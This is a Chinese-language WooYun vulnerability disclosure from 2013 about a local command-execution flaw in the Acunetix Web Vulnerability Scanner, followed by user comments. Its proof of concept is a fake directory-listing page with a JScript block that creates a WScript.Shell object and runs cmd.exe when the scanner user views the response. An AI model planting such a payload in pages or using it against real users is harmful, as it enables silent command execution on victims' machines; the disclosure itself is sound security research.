当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034096

漏洞标题:Web Vulnerability Scanner 远程命令执行漏洞

相关厂商:Acunetix

漏洞作者: 爱梅小礼

提交时间:2013-08-11 15:02

修复时间:2013-11-09 15:03

公开时间:2013-11-09 15:03

漏洞类型:远程代码执行

危害等级:中

自评Rank:7

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

WVS7、8跨本地执行命令,无任何安全提示。
ps:日站还是被别人日,是一个非常值得研究的问题。

详细说明:

WVS将有漏洞的页面下载到本地,用户查看时使用IE框架加载,使用的是本地权限,用wscript.shell执行命令无任何安全提示。

QQ截图20130811144330.jpg

漏洞证明:

测试环境:
WVS7或8+IE8
构造一个假的有漏洞的页面。我构造了一个列目录漏洞,注意代码的最后面是调用wscript组件执行命令
index.php:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
<li><a href="NOTEPAD.EXE"> NOTEPAD.EXE</a></li>
<li><a href="dossier.gif"> dossier.gif</a></li>
<li><a href="download.php"> download.php</a></li>
<li><a href="loader.html"> loader.html</a></li>
<li><a href="logo_i.gif"> logo_i.gif</a></li>
<li><a href="manager.php"> manager.php</a></li>
<li><a href="test.php"> test.php</a></li>
</ul>
</body></html>
<SCRIPT Language="JavaScript">
WSH=new ActiveXObject("WScript.Shell");
WSH.run("cmd.exe");
</SCRIPT>


用WVS扫描网站,果然爆出了列目录,选择它,会如图所示:

222.jpg


找到右边的View HTTP response,单击它,就会运行cmd.exe,且没有任何安全提示。

3333.jpg

修复方案:

这种事情你比我专业

版权声明:转载请注明来源 爱梅小礼@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2013-08-11 16:14 | HRay ( 普通白帽子 | Rank:196 漏洞数:28 | 018)

    略显霸气

  2. 2013-08-11 17:06 | saline ( 普通白帽子 | Rank:231 漏洞数:32 | Focus On Web Secur1ty)

    不明觉厉

  3. 2013-08-11 17:36 | Master ( 路人 | Rank:29 漏洞数:10 )

    有意思 Mark

  4. 2013-08-11 21:46 | 猪头子 ( 普通白帽子 | Rank:189 漏洞数:35 | 自信的看着队友rm -rf/tar挂服务器)

    我擦?

  5. 2013-08-11 21:47 | 膜拜hym ( 路人 | Rank:15 漏洞数:2 )

    我擦?

  6. 2013-08-11 22:10 | chuan ( 路人 | Rank:22 漏洞数:9 | 小菜一个)

    mark 霸气

  7. 2013-08-11 22:57 | snowdance ( 路人 | Rank:0 漏洞数:1 | 好困)

    you shi guo ji ban!niubility!

  8. 2013-08-12 09:36 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    x

  9. 2013-08-12 15:45 | Black World ( 路人 | Rank:0 漏洞数:1 | 无孔不入)

    有意思 .

  10. 2013-08-12 18:17 | Adra1n ( 普通白帽子 | Rank:437 漏洞数:68 )

    关注下。

  11. 2013-08-12 18:38 | txcbg ( 普通白帽子 | Rank:391 漏洞数:53 | 说点什么呢?)

  12. 2013-08-13 10:17 | Bloodwolf ( 实习白帽子 | Rank:47 漏洞数:8 | whoami)

    破解了最新版再提交洞过来。否则不许通过

  13. 2013-08-13 10:26 | 爱梅小礼 ( 实习白帽子 | Rank:93 漏洞数:16 | 我怀念的是无话不说)

    @Bloodwolf 这就最新的

  14. 2013-08-13 11:29 | 老周 ( 实习白帽子 | Rank:71 漏洞数:14 | 信息安全爱好者)

    霸气了呀

  15. 2013-08-14 09:33 | 一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)

    我擦?

  16. 2013-08-15 19:41 | Bloodwolf ( 实习白帽子 | Rank:47 漏洞数:8 | whoami)

    @爱梅小礼 求方法!!求指导!!虽然小白一枚,求做一次伸手党!!!

  17. 2013-08-16 10:31 | qiaoy ( 普通白帽子 | Rank:110 漏洞数:16 )

    .

  18. 2013-08-19 20:02 | 雷疯 ( 路人 | Rank:15 漏洞数:4 | 喝酒 泡妞)

    师傅就是师傅 v587

  19. 2013-08-20 16:27 | 0.VIP ( 路人 | Rank:12 漏洞数:2 | 关注网络安全!)

    mark

  20. 2013-09-06 19:35 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    屌爆了

  21. 2013-09-06 20:12 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    本地跨站 WooYun: FHscan location Cross-Domain Scripting Vulnerability

  22. 2013-09-07 07:44 | p0di ( 普通白帽子 | Rank:121 漏洞数:17 | 1+1 = 2 ?)

    刚看到,目测很吊。

  23. 2013-09-11 09:39 | DragonEgg ( 实习白帽子 | Rank:75 漏洞数:18 | 冷漠无情的绅士,温柔善良的坏蛋。)

    一个月了都,还联系啥啊。公开吧@xsser

  24. 2013-09-16 10:12 | Bloodwolf ( 实习白帽子 | Rank:47 漏洞数:8 | whoami)

    @xsser 一个月过5天了。。出来吧!!!

  25. 2013-10-26 10:32 | X防部 ( 普通白帽子 | Rank:487 漏洞数:137 )

    少年该公开了吧

  26. 2013-10-26 15:16 | 梦半醒 ( 路人 | Rank:15 漏洞数:2 | Computer is all my life.)

    @X防部 就是就是

  27. 2013-11-01 07:48 | Jumbo小号 ( 路人 | Rank:1 漏洞数:1 | Jumbo小弟,我们兄弟遍布五湖四海。。。)

    该公开了o(╯□╰)o

  28. 2013-11-09 15:19 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    真无聊 自己x自己玩么?

  29. 2013-11-09 17:17 | Enjoy_Hacking ( 实习白帽子 | Rank:84 漏洞数:8 | 时间无言,如此这般。)

    反击扫描黑客- -!

  30. 2013-11-09 17:36 | 無情 ( 实习白帽子 | Rank:41 漏洞数:5 | 根据相关法律法规和政策,此信息未予显示。)

    快播。。。。 亮了,

  31. 2013-11-09 18:23 | Sogili ( 普通白帽子 | Rank:129 漏洞数:27 )

    http://en.wooyun.org/bugs/wooyun-2013-036 这个漏洞其实厂商认领了的

  32. 2013-11-09 18:29 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    我真的没看到快播!

  33. 2013-11-09 19:39 | p0di ( 普通白帽子 | Rank:121 漏洞数:17 | 1+1 = 2 ?)

    终于公开了,看决赛去。

  34. 2013-11-09 20:08 | 好人 ( 路人 | Rank:13 漏洞数:6 | 多少人曾爱慕你年轻的容颜)

    我真的没看到快播!

  35. 2013-11-11 22:51 | iceks ( 路人 | Rank:4 漏洞数:1 | 你是我的小呀小苹果~)

    @mark 有意思

  36. 2013-11-12 11:00 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    牛逼!